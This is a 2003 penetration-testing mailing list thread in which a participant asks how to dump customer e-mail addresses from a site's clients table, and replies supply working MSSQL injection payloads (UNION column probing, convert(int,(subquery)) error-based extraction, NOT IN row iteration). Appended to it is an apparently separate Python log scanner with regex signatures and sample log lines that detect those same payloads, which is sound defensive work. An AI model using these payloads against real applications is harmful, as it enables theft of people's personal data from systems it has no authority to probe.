Penetration Testing mailing list archives

Re: SQL injection - get more values


From: Thaidn <thaidn () idealscript com>
Date: Thu, 13 Feb 2003 10:52:22 +0700

Hello dude,
You can't use "union" or "having" when the original query looks like "select * from table" or "select image from table", but this disadvantage can be bypassed easily when using convert(int,(your injected query)). Just put a " ' and convert(int,(injected query)) " and all data is in your hand :D.

On Thursday 13 February 2003 01:51 am, Panos Dimitriou wrote:
One solution is to try to find the exact columns to perform a union select by replacing 1s with 'foo' when you get the error message "operand type clash: text is incompatible with int".

Example:

') union all select sum(email),1,1,1.... from clients--
until you get: operand type clash: text is incompatible with int. Then change the last 1 to 'foo' and continue with 1s, and so on and so forth.

The other solution is to try to get all the data through error cycling, as you already tried, and use NOT IN as follows:

' %2b convert(int, (SELECT max(email) FROM clients WHERE email not in
('anon () isp com','othermail () isp net',...))) %2b '

I hope this works.

Panos Dimitriou
Director, MSS


-----Original Message-----
From: Daniel Savi [mailto:dss () brturbo com]
Sent: Wednesday, February 12, 2003 7:49 PM
To: pen-test () securityfocus com
Subject: SQL injection - get more values



Hi :)

I'm trying to get some info from the clients table and the email field....

I try this param into gubpage.asp?=...
') union select sum(email) from clients--
and got an error about all queries needed... so, I tried to solve it with
') union select sum(email),1,1,1.... from clients--
until I get: operand type clash: text is incompatible with int

I found this answer in this forum (thanks :)), which was:
' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '

I got this:
Syntax error converting the varchar value 'anon () isp com' to a column of data type int

Now, my problem: how can I get other e-mails from the table knowing one valid value?

I tried this
' %2b convert(int, (SELECT email FROM clients WHERE email 'anon () isp com')) %2b '

but no success.

I think I can use NOT IN, but I'm not sure how to use it with convert...

Any tips are welcome!

Thanks

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
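From a defender's side, the probes traded in this thread leave a recognisable trail in web server logs: UNION column probing, convert(int, (subquery)) forcing conversion errors, and NOT IN used to walk through rows one error message at a time. The following Python scanner is an added example, not code from the thread or its participants; it URL-decodes the query string of IIS-style log lines and flags those three patterns. The log lines, the "id" parameter name, the timestamps and the e-mail addresses are constructed for the example.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed IIS-style log lines (date time method uri-stem query); the parameter
# name "id", the e-mail addresses and the timestamps are made up for this example.
SAMPLE_LOG = """\
2003-02-12 19:49:01 GET /gubpage.asp id=42
2003-02-12 19:49:05 GET /gubpage.asp id=')+union+select+sum(email),1,1,1+from+clients--
2003-02-12 19:49:09 GET /gubpage.asp id='+%2b+convert(int,(SELECT+email+FROM+clients+WHERE+email+>+'a'))+%2b+'
2003-02-12 19:50:12 GET /gubpage.asp id='+%2b+convert(int,(SELECT+max(email)+FROM+clients+WHERE+email+not+in+('a@x.com','b@y.net')))+%2b+'
2003-02-12 19:51:00 GET /search.asp q=convert+my+int+to+string
"""

# Signatures for the techniques in the thread: UNION column probing, error-based
# extraction via convert(int, (subquery)), and NOT IN used to walk through rows.
SIGNATURES = {
    "union_probe": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "convert_error_based": re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    "not_in_iteration": re.compile(r"\bnot\s+in\s*\(", re.I),
}

def decode_query(raw: str) -> str:
    """URL-decode a query string: '+' and %xx first, then a second %xx pass for double encoding."""
    return unquote(unquote_plus(raw))

def scan_line(line: str):
    """Return (uri_stem, decoded_query, matched_signature_names), or None if the line does not parse."""
    parts = line.split()
    if len(parts) < 5:
        return None
    _date, _time, _method, stem, query = parts[:5]
    decoded = decode_query(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return stem, decoded, hits

def scan_log(text: str):
    """Return the findings for every line that matched at least one signature."""
    findings = []
    for line in text.splitlines():
        result = scan_line(line)
        if result is not None and result[2]:
            findings.append(result)
    return findings

if __name__ == "__main__":
    for stem, decoded, hits in scan_log(SAMPLE_LOG):
        print(f"{stem}  {', '.join(hits)}  <- {decoded}")
```

The ODBC error text that Daniel pasted ("Syntax error converting the varchar value ...") is the other half of the signal: an application that returns raw database errors to the client is what makes this extraction technique work, so a matching signature in the logs together with 500 responses from the same client is worth an alert.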

